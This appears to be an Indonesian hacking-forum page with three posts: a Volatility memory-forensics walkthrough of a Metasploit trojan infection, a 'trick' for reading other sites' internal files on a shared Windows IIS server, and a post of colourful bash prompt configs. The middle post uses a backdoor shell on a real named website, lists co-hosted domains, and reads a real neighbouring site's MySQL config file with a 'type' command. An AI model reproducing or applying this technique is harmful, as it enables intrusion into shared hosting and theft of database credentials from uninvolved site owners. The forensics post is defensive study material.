File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc0


Ternyata terdapat koneksi ke alamat 192.168.88.44 pada port 8080
bisa kita pastikan bahwa IP ini adalah IP yang mentriger proses. Dimana nama file tersebut adalah aktifitas exploirasi payload dengan nama file trojan.exe



Identifikasi tipe malware yang menginfeksi komputer tersebut

Untuk mengetahui tipe dari malware yang menginfeksi tentu kita bisa menggunakan anti-virus, disini kita akan menggunakan virustotal

Namun sebelumnya kita akan mengambil file tersebut, dimana file tersebut berjalan pada wscript.exe pada PID 584, metsvc.exe pada PID 1644 serta qNPEwOBAwGzOSN. pada PID 1760, tapi disini kita hanya perlu dump file  metsvc.exe dan qNPEwOBAwGzOSN. Karena wscript tersebut ada karena adanya file trojan.exe tadi sehingga wscript menciptakan proses qNPEwOBAwGzOSN.

Mari kita buat dulu direktory untuk menampung output dengan nama "virus"
Jalankan perintah berikut untuk membuat direktory dengan mkdir
Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  mkdir virus


Jalankan perintah

Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus


Maka output yang diperoleh adalah

Code:
┌─[ Thu Aug 17 03:58:07 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus
Volatility Foundation Volatility Framework 2.6
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x821c9d08 0x00400000 metsvc.exe           OK: executable.1644.exe
0x821cc7e0 0x00400000 qNPEwOBAwGzOSN.      OK: executable.1760.exe


Quote:[Image: qS4nmNzSRjCmhUQg9R7-2g.png]



Upload kedua file tersebut pada virustotal

Berikut hasil yang diperoleh
untuk file executable.1760.exe : https://www.virustotal.com/#/file/3e8719...b0/details
untuk file executable.1644.exe : https://www.virustotal.com/#/file/065d00.../detection

Dari hasil analisa dari virustotal diperoleh 46 dari 61 antivirus di dunia menganggap file tersebut berbahaya dan merupakan jenis trojan




Identifikasi apakah di komputer tersebut terinstall antivirus

Untuk mengidentifikasi apakan di komputer tersebut terinstall antivirus atau tidak, kita dapat menggunkan plugin shimcache


Code:
┌─[ Thu Aug 17 04:11:21 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 shimcache


Maka ouput yang diperoleh adalah


Code:
┌─[ Thu Aug 17 04:11:21 3 files, 1.0G
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 shimcache
Volatility Foundation Volatility Framework 2.6
Last Modified                  Last Update                    Path
------------------------------ ------------------------------ ----
2008-04-14 02:42:40 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\verclsid.exe
2008-04-14 02:42:06 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\SHELL32.dll
2008-04-14 02:42:44 UTC+0000   2013-11-14 08:50:09 UTC+0000   \??\C:\WINDOWS\system32\logon.scr
2013-10-30 08:28:57 UTC+0000   2014-02-05 08:42:49 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\avp.exe
2013-11-12 07:43:05 UTC+0000   2013-11-12 07:45:56 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\patch_c_kis2014.exe
1970-01-01 00:00:00 UTC+0000   2014-02-05 08:39:03 UTC+0000   C:\WINDOWS\system32\MSCOREE.DLL
2013-11-12 07:42:33 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\avpui.exe
2013-04-12 09:53:44 UTC+0000   2014-02-05 08:37:42 UTC+0000   \??\C:\WINDOWS\system32\VBoxService.exe
2008-04-14 02:41:52 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\System32\cscui.dll
2010-03-18 06:16:28 UTC+0000   2014-02-05 08:37:53 UTC+0000   \??\C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2013-04-12 09:53:46 UTC+0000   2014-02-05 08:38:16 UTC+0000   \??\C:\WINDOWS\system32\VBoxTray.exe
2008-04-14 02:42:04 UTC+0000   2014-02-05 08:38:17 UTC+0000   \??\C:\WINDOWS\system32\NETSHELL.dll
2013-06-17 05:35:50 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\wmi32.exe
2008-04-14 02:42:42 UTC+0000   2013-11-14 09:13:02 UTC+0000   \??\C:\WINDOWS\system32\wscntfy.exe
2010-03-18 06:16:28 UTC+0000   2013-11-15 01:52:41 UTC+0000   \??\C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
2013-06-17 05:35:26 UTC+0000   2013-11-14 09:13:39 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\shellex.dll
2008-04-14 02:42:42 UTC+0000   2013-11-14 09:11:58 UTC+0000   \??\C:\WINDOWS\system32\wuaucpl.cpl
2008-04-14 02:42:06 UTC+0000   2013-11-14 09:11:58 UTC+0000   \??\C:\WINDOWS\system32\remotepg.dll
2008-04-14 02:42:06 UTC+0000   2013-11-14 09:11:52 UTC+0000   \??\C:\WINDOWS\system32\shgina.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\twext.dll
2008-04-14 02:41:52 UTC+0000   2013-11-12 15:38:56 UTC+0000   \??\C:\WINDOWS\system32\dfsshlex.dll
2013-06-17 05:35:20 UTC+0000   2013-11-13 02:06:56 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\office_antivirus.dll
2013-11-13 01:08:10 UTC+0000   2013-11-13 01:08:12 UTC+0000   \??\C:\Documents and Settings\WINVICTIM\Desktop\f7915612721b0e8dad57bdfcb29ac9bb-freeFTPd.exe
2005-08-29 14:09:04 UTC+0000   2014-02-05 08:39:19 UTC+0000   \??\C:\Program Files\freeFTPd\FreeFTPdService.exe
2008-04-14 02:41:54 UTC+0000   2014-02-05 08:39:56 UTC+0000   \??\C:\WINDOWS\system32\filemgmt.dll
2008-04-14 02:42:12 UTC+0000   2013-11-13 01:51:28 UTC+0000   \??\C:\WINDOWS\system32\zipfldr.dll
2008-04-14 02:42:02 UTC+0000   2013-11-13 01:51:39 UTC+0000   \??\C:\WINDOWS\system32\mydocs.dll
2013-11-13 02:06:58 UTC+0000   2013-11-13 02:08:20 UTC+0000   \??\C:\Documents and Settings\WINVICTIM\Desktop\putty.exe
2008-04-14 02:42:06 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\shdocvw.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\cryptext.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 02:47:03 UTC+0000   \??\C:\WINDOWS\system32\docprop2.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 03:04:28 UTC+0000   \??\C:\WINDOWS\system32\snmpsnap.dll
2008-04-14 02:42:06 UTC+0000   2013-11-14 03:04:28 UTC+0000   \??\C:\WINDOWS\system32\servdeps.dll
2013-11-14 08:28:20 UTC+0000   2014-02-05 08:38:17 UTC+0000   \??\C:\WINDOWS\system32\backdoor.exe
2004-08-04 12:00:00 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\mycomput.dll
2008-04-14 02:42:04 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\ntmsmgr.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\system32\dfrgsnap.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 09:13:45 UTC+0000   \??\C:\WINDOWS\System32\dmdskmgr.dll
2008-04-14 02:41:54 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\els.dll
2008-04-14 02:41:58 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\localsec.dll
2008-04-14 02:42:08 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\smlogcfg.dll
2008-04-14 02:41:52 UTC+0000   2013-11-14 09:13:46 UTC+0000   \??\C:\WINDOWS\system32\devmgr.dll
2008-04-14 02:42:36 UTC+0000   2013-11-14 09:15:29 UTC+0000   \??\C:\Program Files\Outlook Express\setup50.exe
2008-04-14 02:42:40 UTC+0000   2013-11-14 09:15:29 UTC+0000   \??\C:\WINDOWS\inf\unregmp2.exe
2008-04-14 02:42:40 UTC+0000   2013-11-14 09:17:18 UTC+0000   \??\C:\WINDOWS\system32\tourstart.exe
2013-06-17 05:35:20 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\klwtblfs.exe
2013-06-17 05:35:18 UTC+0000   2014-02-05 08:42:50 UTC+0000   \??\C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\klwtbws.exe
2008-04-14 02:42:10 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\webcheck.dll
2008-04-14 02:42:10 UTC+0000   2014-02-05 08:43:34 UTC+0000   \??\C:\WINDOWS\system32\urlmon.dll


Quote:[Image: YuLF6_i_SYamJ9Zaqjm7Mg.png]


Ternyata, komputer tersebut memiliki antivirus Kaspersky




Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut

Selanjutnya menemukan service atau applikasi "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut. Sebelumnya kita telah memperoleh hasil pada offset : 0x385630, yang merupakan sebuah service yang biasanya digunakan untuk melakukan exploitasi dengan metasploit dengan Binary Path yang memiliki karakter aneh QeJPYErizYmFJn menggunakan plugin svcscan.

Dimana service ini menunjukkan berjalannya sebuah file dengan nama metsvc.exe
Dari output pslist file metsvc.exe diperoleh PID nya adalah 1644 file tersebut merupakan celah atau vulnerable yang memungkinkan untuk dimanfaatkan hacker masuk ke dalam komputer. Hasil analisis file executable.1644.exe : https://www.virustotal.com/#/file/065d00.../detection

Print this item

  [trik] bypass file internal Vhosts Windows Server
Posted by: P4KyU - 08-16-2017, 11:14 AM - Forum: Microsoft Windows - No Replies

Hi para pencari method bypass   Big Grin  

seperti judul thread diatas, mungkin anda terbiasa dengan metode symlink untuk melihat suatu file website yang satu server atau satu hostingan dengan website yang sudah anda bercocok tanam dengan shell backdoor, akan tetapi metode symlink itu hanya berlaku di Linux. 

Quote:[ Apa itu SymLink ]
Symbolic Link atau yang biasa dikenal dengan sebutan Symlink atau nama lainnya softlink adalah sebuah tipe spesial dari file yang berisikan referensi ke file atau direktori lain.
Referensi : https://id.wikipedia.org/wiki/Tautan_simbolis

kalau di Windows itu bukan Symlink, akan tetapi namanya shortcut.
oh iya, vhosts itu singkatan dari virtual host. 
Quote:Virtual Host adalah cara untuk mengatur banyak website atau URL di dalam satu mesin atau satu IP.
Referensi : https://en.wikipedia.org/wiki/Virtual_hosting  

langsung saja kita praktek biar lebih jelas. 
disini saya tidak menjelaskan bagaimana shell backdoor berada di website yang saya jadikan sebagai pembelajaran. 

website yang saya jadikan pembelajaran adalah : http://www.dps-secunderabad.in 
[Image: 5EfewZ5HTjWaAKQddwiKLw.png]

httpdocs adalah kata lain dari htdocs kalau di xampp/lamp lokasi penyimpanan data website yang berupa folder atau file.

disini kita akan melihat suatu file internal yang satu server dengan website yang saya jadikan pembelajaran. 
kita akan scan untuk mengetahui website apa saja yang satu server. 

scan tools online : http://www.yougetsignal.com/tools/web-si...eb-server/  
[Image: 2IGrivplRCSB88uSGQ4eGQ.png]


setelah di scan ada 40 website yang satu server. dan lingkaran merah ada target kita untuk melihat file internalnya. 
oh iya, disini security yang dipakai oleh webserver adalah Microsoft IIS 7.5 yang artinya untuk eksekusi folder berupa pindah directory tidak di ijinkan. 

lanjut ketahap berikut. 
target kita adalah : https://www.brihaspathi.com 
saya akan melihat file internalnya yang berupa file koneksi ke mysql. disni kita bermain feeling. yang umum digunakan untuk menyimpan file koneksi mysql itu berada di folder config atau includes.  kita coba salah satunya untuk memastikan. 
ternyata ada folder includes  
[Image: uCW8E2R9RPqLUBsWh7euZA.png]


kita akan mencari tau nama file koneksinya yang berada di folder includes. yang umum di pake adalah config.php atau configuration.php
[Image: wxobYgKjRhiCosR2Zfm7rQ.png]

saya mencoba dengan nama file config.php pada folder includes, dan ternyata blank, ingat blank dan error beda ya. 
file internal itu tidak bisa di access oleh url, dan hasilnya blank. kalau error artinya nama filenya tidak ada. 
[Image: 5cK2Mr68Q_mR1_4p4QIlZw.png]

berarti bisa disimpulkan bahwa nama file untuk koneksi ke mysql yang berada pada folder includes adalah config.php  
lanjut lagi... 
trik untuk melihat isi file internal dalam file config.php pada windows server. 
code: 

Quote:type C:\Inetpub\vhosts\domain-target.com\httpdocs\includes\config.php
 [Image: FhhGIzSwTJezrSxBbAwhbQ.png]

perhatikan code diatas dengan gambar. jadi disesuaikan saja dengan nama domainnya. 
misalnya seperti target saya : 
Quote:type C:\Inetpub\vhosts\brihaspathi.com\httpdocs\includes\config.php

cara eksekusinya : 
buka console dan jalan perintah ini : 
Quote:type C:\Inetpub\vhosts\site-tagetcom\httpdocs\includes\config.php
[Image: DtctmsgwR86aLC4hgsGvrQ.png]


hasil saya adalah : 
Quote:type C:\Inetpub\vhosts\brihaspathi.com\httpdocs\includes\config.php
[Image: 8yAB3RxSQROA4X7fb_fR6g.png]


Tambahan : 

Quote:ingat untuk eksekusi sebuah file website melalui system tidak memakai / akan tetapi memakai


Pertanyaan : 
Quote:kenapa eksekusi dengan awalan type bukan view 

Jawaban : 
Quote:show karena webserver menggunakan windows server.  coba buka command prompt ( CMD) terus tulis help. 
disitu anda mendapatkan cluenya. clue yang dimana saya jadikan sebagai membuka file internal tersebut. atau bisa lihat gambar dibawah.


[Image: Vm7ZnI38T165ynN2h80rYg.png]


Quote:type yang artinya : Menampilkan isi dari sebuah berkas (dalam bentuk teks) ke dalam standard output.
Referensi : https://id.wikipedia.org/wiki/Perintah_DOS   


Ini hanya sebuah pembelajaran semata. 
semoga bisa menambah wawasan anda. 
jangan lupa like Fanspage : https://www.facebook.com/loading.gov/ 
atau bisa lihat profil kami  : https://3njhuteam.github.io/

Print this item

Rainbow Config bashrc for terminal
Posted by: scriptKiddie - 08-13-2017, 12:02 PM - Forum: Bash - Replies (1)

Assalamualaikum warahmatulahi wabarakatu..
Kembali lagi dengan aku desaigner tertampaaaannn sepanjang sejarah dongeng..

NEXT >>

Quote:Masuk terminal dan ketikan :
Code:
nano .bashrc
ATAU
Code:
gedit .bashrc

Lalu pastekan code di bawah, tepatanya di bawah code fi setelah itu save, Kalau kamu ngak tau cara save silahkan klik ini.


Quote:Jika kamu suka banyak warna :
Code:
if [[ ${EUID} == 0 ]] ; then
PS1='\e[1;31;48;5;234m\u \e[38;5;240mon \e[1;38;5;28;48;5;234m\h \e[38;5;54m\d \@\e[0m\n\e[0;31;48;5;234m[\w] \e[1m\$\e[0m '
else
PS1='\e[1;38;5;56;48;5;234m\u \e[38;5;240mon \e[1;38;5;28;48;5;234m\h \e[38;5;54m\d \@\e[0m\n\e[0;38;5;56;48;5;234m[\w] \e[1m\$\e[0m '
fi
Quote:[Image: u5PROauGRHmnCoveteH2dw.png]

Jika kamu suka design simple :
Code:
PS1='\[\e[0m\]\[\e[48;5;236m\]\[\e[38;5;197m\]\u\[\e[38;5;197m\]@\[\e[38;5;197m\]\h\[\e[38;5;105m\] \[\e[38;5;221m\]\w\[\e[38;5;221m\]\[\e[38;5;105m\]\[\e[0m\]\[\e[38;5;236m\]\342\226\214\342\226\214\342\226\214\[\e[0m\]'
Quote:[Image: ziUY-PTLTlKoLUH3e_vlQA.png]

Jika Suka dengan design Elegan :
Code:
PS1="\[\e[47m\]\[\e[1;30m\]*\[\e[0m\]\[\e[00;36m\][\u]\n\[\e[47m\]\[\e[1;30m\]\#\[\e[0m\]  └── \[\e[0m\]\[\e[0;37m\][\h] \[\e[0m\]\n     └── \[\e[0m\]\[\e[1;33m\]>>\[\e[0m\]
Quote:
[Image: gcstIa_1RF6h1oSYPwVWzg.png]

Oke, mungkin itu aja, kalau kamu punya desain bash terminal yg kerryeenn buangetttt Cool . di taruh di kolom post di bawah ya!!
Ilmu itu di bagi coy!! #eh kalau di bagi hasil akhirnya dikit dong, Tzerah lu deh Tong ... Dodgy

Print this item